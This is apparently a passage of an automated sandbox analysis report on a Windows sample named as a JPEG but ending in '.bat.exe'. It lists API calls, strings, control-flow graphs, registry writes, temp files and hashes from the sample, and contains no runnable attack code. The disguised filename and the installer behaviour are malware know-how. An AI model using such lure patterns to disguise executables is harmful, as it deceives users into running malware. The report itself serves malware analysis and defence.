                                  • Opcode ID: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
                                  • Instruction ID: 3d8c07b43999b23b4b99d6b0442eda675a509ebc6c38f8f9f8ea4228a2b68225
                                  • Opcode Fuzzy Hash: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
                                  • Instruction Fuzzy Hash: 0D010871C04259EAEF019BA1CC447EFBFB9EF04354F10817AD905B6290E378A604CBAA

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 649 406294-4062b4 GetSystemDirectoryA 650 4062b6 649->650 651 4062b8-4062ba 649->651 650->651 652 4062ca-4062cc 651->652 653 4062bc-4062c4 651->653 655 4062cd-4062ff wsprintfA LoadLibraryExA 652->655 653->652 654 4062c6-4062c8 653->654 654->655
                                  APIs
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062AB
                                  • wsprintfA.USER32 ref: 004062E4
                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                  • String ID: %s%s.dll$UXTHEME$\
                                  • API String ID: 2200240437-4240819195
                                  • Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                  • Instruction ID: b350a7b34e5dfe1d1a07fade029f1484d0e2916aa38c44d12689a48c44b66a33
                                  • Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                  • Instruction Fuzzy Hash: FAF0F63091410AAADF15AB74DC0DFFB365CAB08304F1405BAB646E11D2E6B8E9288B69

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 656 402f9c-402fb0 657 402fb2 656->657 658 402fb9-402fc1 656->658 657->658 659 402fc3 658->659 660 402fc8-402fcd 658->660 659->660 661 402fdd-402fea call 403178 660->661 662 402fcf-402fd8 call 40318e 660->662 666 402ff0-402ff4 661->666 667 40312f 661->667 662->661 668 403118-40311a 666->668 669 402ffa-40301a GetTickCount call 406427 666->669 670 403131-403132 667->670 671 403163-403167 668->671 672 40311c-40311f 668->672 680 40316e 669->680 682 403020-403028 669->682 674 403171-403175 670->674 675 403134-40313a 671->675 676 403169 671->676 677 403121 672->677 678 403124-40312d call 403178 672->678 683 40313c 675->683 684 40313f-40314d call 403178 675->684 676->680 677->678 678->667 689 40316b 678->689 680->674 686 40302a 682->686 687 40302d-40303b call 403178 682->687 683->684 684->667 693 40314f-40315b call 405baa 684->693 686->687 687->667 694 403041-40304a 687->694 689->680 698 403114-403116 693->698 699 40315d-403160 693->699 696 403050-40306d call 406447 694->696 702 403110-403112 696->702 703 403073-40308a GetTickCount 696->703 698->670 699->671 702->670 704 40308c-403094 703->704 705 4030cf-4030d1 703->705 708 403096-40309a 704->708 709 40309c-4030cc MulDiv wsprintfA call 405091 704->709 706 4030d3-4030d7 705->706 707 403104-403108 705->707 711 4030d9-4030de call 405baa 706->711 712 4030ec-4030f2 706->712 707->682 713 40310e 707->713 708->705 708->709 709->705 717 4030e3-4030e5 711->717 716 4030f8-4030fc 712->716 713->680 716->696 718 403102 716->718 717->698 719 4030e7-4030ea 717->719 718->680 719->716
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CountTick$wsprintf
                                  • String ID: ... %d%%
                                  • API String ID: 551687249-2449383134
                                  • Opcode ID: c82de60818243e465859c967a3516e6db8ce76542d84b6bf7e6dfb16085b7dab
                                  • Instruction ID: 5f1f0f90ab52480f624b15d228fda7616e1eaa7d5f1d5864c66c4d16daa58cb3
                                  • Opcode Fuzzy Hash: c82de60818243e465859c967a3516e6db8ce76542d84b6bf7e6dfb16085b7dab
                                  • Instruction Fuzzy Hash: 69518271901219ABCF10DF65DA4469F7BB8AB08756F14413BF910BB2C0C7389E51CBAA

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 720 405b32-405b3c 721 405b3d-405b68 GetTickCount GetTempFileNameA 720->721 722 405b77-405b79 721->722 723 405b6a-405b6c 721->723 725 405b71-405b74 722->725 723->721 724 405b6e 723->724 724->725
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00405B46
                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B60
                                  Strings
                                  • "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe", xrefs: 00405B32
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B35
                                  • nsa, xrefs: 00405B3D
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                  • API String ID: 1716503409-768624884
                                  • Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                  • Instruction ID: 47ad9e4c3b070603f63866c15a94f77f10573a77d4085d28ed577f0a2abf86d9
                                  • Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                  • Instruction Fuzzy Hash: FFF089367082086BD7104F55DC04B9B7BA8DF91750F10803BFA049A191D6B4B9548B59

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 726 6dda16df-6dda171b call 6dda1a9c 730 6dda1838-6dda183a 726->730 731 6dda1721-6dda1725 726->731 732 6dda172e-6dda173b call 6dda22b5 731->732 733 6dda1727-6dda172d call 6dda2273 731->733 738 6dda176b-6dda1772 732->738 739 6dda173d-6dda1742 732->739 733->732 740 6dda1792-6dda1796 738->740 741 6dda1774-6dda1790 call 6dda249c call 6dda1559 call 6dda1266 GlobalFree 738->741 742 6dda175d-6dda1760 739->742 743 6dda1744-6dda1745 739->743 744 6dda1798-6dda17de call 6dda156b call 6dda249c 740->744 745 6dda17e0-6dda17e6 call 6dda249c 740->745 766 6dda17e7-6dda17eb 741->766 742->738 746 6dda1762-6dda1763 call 6dda2c7b 742->746 748 6dda174d-6dda174e call 6dda29c0 743->748 749 6dda1747-6dda1748 743->749 744->766 745->766 759 6dda1768 746->759 762 6dda1753 748->762 754 6dda174a-6dda174b 749->754 755 6dda1755-6dda175b call 6dda2676 749->755 754->738 754->748 765 6dda176a 755->765 759->765 762->759 765->738 769 6dda1828-6dda182f 766->769 770 6dda17ed-6dda17fb call 6dda2462 766->770 769->730 772 6dda1831-6dda1832 GlobalFree 769->772 776 6dda17fd-6dda1800 770->776 777 6dda1813-6dda181a 770->777 772->730 776->777 779 6dda1802-6dda180a 776->779 777->769 778 6dda181c-6dda1827 call 6dda14e2 777->778 778->769 779->777 781 6dda180c-6dda180d FreeLibrary 779->781 781->777
                                  APIs
                                    • Part of subcall function 6DDA1A9C: GlobalFree.KERNEL32(?), ref: 6DDA1CEB
                                    • Part of subcall function 6DDA1A9C: GlobalFree.KERNEL32(?), ref: 6DDA1CF0
                                    • Part of subcall function 6DDA1A9C: GlobalFree.KERNEL32(?), ref: 6DDA1CF5
                                  • GlobalFree.KERNEL32(00000000), ref: 6DDA178A
                                  • FreeLibrary.KERNEL32(?), ref: 6DDA180D
                                  • GlobalFree.KERNEL32(00000000), ref: 6DDA1832
                                    • Part of subcall function 6DDA2273: GlobalAlloc.KERNEL32(00000040,?), ref: 6DDA22A4
                                    • Part of subcall function 6DDA2676: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6DDA175B,00000000), ref: 6DDA2746
                                    • Part of subcall function 6DDA156B: lstrcpyA.KERNEL32(?,6DDA4010,00000000,6DDA1568,?,00000000,6DDA16B7,00000000), ref: 6DDA1581
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true
                                  • Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                  • String ID:
                                  • API String ID: 1791698881-3916222277
                                  • Opcode ID: 641966b4e0170f88d991de00eb44997f06ea8c8494bd21b68bf19f84c0f2e76b
                                  • Instruction ID: dd42f562c64be1f9593e7e3b16cb43ae92b04c04455db9469daeefc4abd069bc
                                  • Opcode Fuzzy Hash: 641966b4e0170f88d991de00eb44997f06ea8c8494bd21b68bf19f84c0f2e76b
                                  • Instruction Fuzzy Hash: FA419D71104216DADB11BFB5CD84BAA3BACBB16328F0CD424FA599A182DBB4D045C7B4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 783 4023d6-402407 call 402acb * 2 call 402b5b 790 402957-402966 783->790 791 40240d-402417 783->791 793 402427-40242a 791->793 794 402419-402426 call 402acb lstrlenA 791->794 795 40242c-40243d call 402aa9 793->795 796 40243e-402441 793->796 794->793 795->796 800 402452-402466 RegSetValueExA 796->800 801 402443-40244d call 402f9c 796->801 805 402468 800->805 806 40246b-402548 RegCloseKey 800->806 801->800 805->806 806->790 808 40271c-402723 806->808 808->790
                                  APIs
                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm54DF.tmp,00000023,00000011,00000002), ref: 00402421
                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsm54DF.tmp,00000000,00000011,00000002), ref: 0040245E
                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsm54DF.tmp,00000000,00000011,00000002), ref: 00402542
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CloseValuelstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp
                                  • API String ID: 2655323295-93809639
                                  • Opcode ID: 9b26400be6dbbbb49eeb1923877ef4174091b91fb929c0756af875ffc579e184
                                  • Instruction ID: 1fc307ab1697ef986dd5cd2868f3fef353c7a70d956ff55dcab5481d81c0b37e
                                  • Opcode Fuzzy Hash: 9b26400be6dbbbb49eeb1923877ef4174091b91fb929c0756af875ffc579e184
                                  • Instruction Fuzzy Hash: E2119371E00115BEDF10EFA5DE49AAEBA74EB54318F20843BF504F71D1C6B95D419B28
                                  APIs
                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202E
                                    • Part of subcall function 00405091: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
                                    • Part of subcall function 00405091: lstrlenA.KERNEL32(004030CC,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
                                    • Part of subcall function 00405091: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,004030CC,004030CC,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000), ref: 004050ED
                                    • Part of subcall function 00405091: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll), ref: 004050FF
                                    • Part of subcall function 00405091: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
                                    • Part of subcall function 00405091: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
                                    • Part of subcall function 00405091: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D
                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                  • String ID:
                                  • API String ID: 2987980305-0
                                  • Opcode ID: 23d1d6007855e727fc8cd3913e41b4a50d01db3cb65b56c6734e8942852e25e6
                                  • Instruction ID: fd60b9c6cfc4bddbe94fc7e5a8503348695d94644a3847b69ed94d97695b539d
                                  • Opcode Fuzzy Hash: 23d1d6007855e727fc8cd3913e41b4a50d01db3cb65b56c6734e8942852e25e6
                                  • Instruction Fuzzy Hash: BC21C971A00215BBCF207FA48E49BAE75B0AB54359F20413BF601B22D0C6BD4A42D66E
                                  APIs
                                    • Part of subcall function 0040599B: CharNextA.USER32(?,?,shovel\Undrinking.veg,?,00405A07,shovel\Undrinking.veg,shovel\Undrinking.veg,75953410,?,C:\Users\user\AppData\Local\Temp\,00405752,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A9
                                    • Part of subcall function 0040599B: CharNextA.USER32(00000000), ref: 004059AE
                                    • Part of subcall function 0040599B: CharNextA.USER32(00000000), ref: 004059C2
                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                    • Part of subcall function 00405557: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040559A
                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers,00000000,00000000,000000F0), ref: 0040163C
                                  Strings
                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers, xrefs: 00401631
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers
                                  • API String ID: 1892508949-496868922
                                  • Opcode ID: 77366072376007a81e873d624303f28143037452507457246f6624776d99043d
                                  • Instruction ID: 1397d73bc892ae661a741dfecf38a44b6d03d9e6e7f57cd6dcc913c124f66756
                                  • Opcode Fuzzy Hash: 77366072376007a81e873d624303f28143037452507457246f6624776d99043d
                                  • Instruction Fuzzy Hash: 59110431608152EBCF217FA55C415BF66B09A96324B28093FE5D2B22E2D63D4E43973F
                                  APIs
                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 00405632
                                  • CloseHandle.KERNEL32(?), ref: 0040563F
                                  Strings
                                  • Error launching installer, xrefs: 0040561C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID: Error launching installer
                                  • API String ID: 3712363035-66219284
                                  • Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                  • Instruction ID: 9728a5d5e843408a2f651da6c1778568bac2657747ba6051cf584ee7dfff0d45
                                  • Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                  • Instruction Fuzzy Hash: B0E046F0A00209BFEB009B60EC09F7B7AACEB10748F404861BD11F32A0E374A9108A79
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
